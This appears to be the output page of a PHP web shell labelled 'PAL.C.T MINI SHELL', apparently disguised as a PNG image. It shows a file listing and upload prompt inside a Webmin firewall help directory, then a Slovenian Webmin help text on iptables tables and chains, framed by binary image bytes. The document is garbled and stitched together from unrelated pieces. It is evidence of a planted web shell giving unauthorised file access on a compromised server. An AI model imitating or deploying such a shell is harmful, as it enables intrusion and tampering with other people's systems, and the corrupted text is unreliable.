php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall6/help/
upload
files >> //usr/libexec/webmin/firewall6/help/intro.sl.auto.html

<header> Linux požarni zid </header><h3> Uvod v modul </h3> Ta modul vam omogoča, da konfigurirate funkcije požarnega zidu IPtables, ki jih najdemo v seriji 2.4 Linux jeder. Za razliko od nekaterih drugih konfiguracijskih programov požarnega zidu namesto da ustvari skript lupine, ki nastavi požarni zid, prebere in uredi shranjevalno datoteko v obliki, ki jo bere in zapiše <tt>ipi (6) tabele-obnovi</tt> in <tt>ipi (6) tabele-shrani</tt> . <p> Če že imate požarni zid v sistemu, ki je bil nastavljen ročno ali iz skriptne datoteke, bo modul ponudil, da ga pretvori v datoteko za shranjevanje IPtables za vas in ustvari skript, ki ga je treba zagnati ob zagonu in aktivirati pravila v datoteka. Če pa to storite, potem ne bi smeli več urejati skripta pravil požarnega zidu in jo ne bi smeli izvajati niti ob zagonu. <p><h3> Pregled IPtables </h3> Vsak omrežni paket, ki vstopi, izstopi iz ali ga posreduje vaš sistem, se preveri z eno ali več verigami, da ugotovi, kaj se bo z njim zgodilo. Vsaka veriga vsebuje nič ali več pravil, od katerih ima vsak pogoj (da določi, kateri paketi se ujemajo) in dejanje (za nadzor, kaj se zgodi s temi ujemajočimi se paketi). Vsaka veriga ima tudi privzeto dejanje, ki nadzoruje, kaj se zgodi s paketi, ki se ne ujemajo z nobenim pravilom. <p> Vsaka veriga je del tabele, od katerih so trenutno tri: <ul><li> <b>Filtriranje paketov ( <tt>filter</tt> )</b> <br> Verige v tej tabeli se lahko uporabljajo za nadzor podatkov, ki prihajajo v vaš sistem od drugih gostiteljev v omrežju, podatkov, ki jih iz vašega sistema pošiljajo uporabniki in procesi, in podatkov, ki jih vaš sistem posreduje, če deluje kot usmerjevalnik. <p><li> <b>Prevajanje omrežnega naslova ( <tt>nat</tt> )</b> <br> Ta tabela se lahko uporablja za nastavitev NAT ali zakrivanje mask, kar je koristno, če želite celotnemu omrežju strojev omogočiti dostop do interneta prek samo enega pravega naslova IP. <p><li> <b>Sprememba paketov ( <tt>mangle</tt> )</b> <br> Ta tabela je za spreminjanje paketov, ki jih posreduje ali pošilja iz vašega sistema. <p></ul> Poleg standardnih verig, ki so del vsake tabele, lahko ustvarite tudi svoje verige, ki jih lahko po pravilih poganjajo vgrajene verige. To je lahko koristno za razvrščanje in skupno rabo pravil, ki se lahko uporabljajo na več mestih. <p><h3> Glavna stran </h3> Na glavni strani tega modula so navedene vse verige in pravila iz ene od razpoložljivih tabel, izbranih s seznama v zgornjem levem kotu. Spodaj je razdelek za vsako verigo v trenutni tabeli z vsemi pravili v vsaki verigi in njihovimi pogoji, ki so najbolje opisani v modulih. Za vsako verigo lahko spremenite privzeto dejanje s spustnega seznama, če je veriga ena izmed vgradnih za tabelo, ali pa jo izbrišete z gumbom Izbriši verigo, če je uporabniško določeno. <p> Če ga želite urediti, kliknite katero koli pravilo v verigi, za premikanje navzgor ali navzdol kliknite puščice na desni strani vsake vrstice ali pa kliknite gumb Dodaj pravilo, da dodate novo. Če dodate ali uredite pravilo, vas bo preusmerila na stran, na kateri lahko izberete dejanje za vsako pravilo in pogoje, za katere se dejanje izvede. <p> Na dnu strani je gumb za aktiviranje trenutne konfiguracije požarnega zidu, tako da ga naložite v jedro z ukazom <tt>ipi (6) table-recovery</tt> . Spodaj je gumb za vzvratno uporabo - odvzem konfiguracije, ki je trenutno v jedru, in omogočanje urejanja. Na koncu, če vaša distribucija to podpira, obstaja gumb, s katerim lahko spremenite, ali je požarni zid aktiviran ob zagonu ali ne. <p><h3> Filtriranje verig </h3> Za boljše sodelovanje z zunanjimi skripti iptables lahko izključite posamezne verige iz obdelave s požarnim zidom. Če želite to narediti, morate v nastavitvah izbrati neposredno obdelavo pravil in vnesti seznam filtrov, kar izključuje ustrezne verige iz obdelave. Verige, ki niso izključene z urejanjem, so označene s sporočilom &quot;ne upravlja požarni zid&quot;. <p><h3> IP garniture </h3> Novejše različice tabele ip (6) podpirajo razširitev ipset. Nabori IP so seznami naslovov IP v glavnem pomnilniku, ki jih je mogoče iskati zelo učinkovito in jih uporabiti kot pogoj v pravilih. Na glavni strani so prikazani obstoječi nizi IP, ki jih lahko uporabljajo pravila. Trenutno pa v požarnem zidu teh ni mogoče upravljati. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`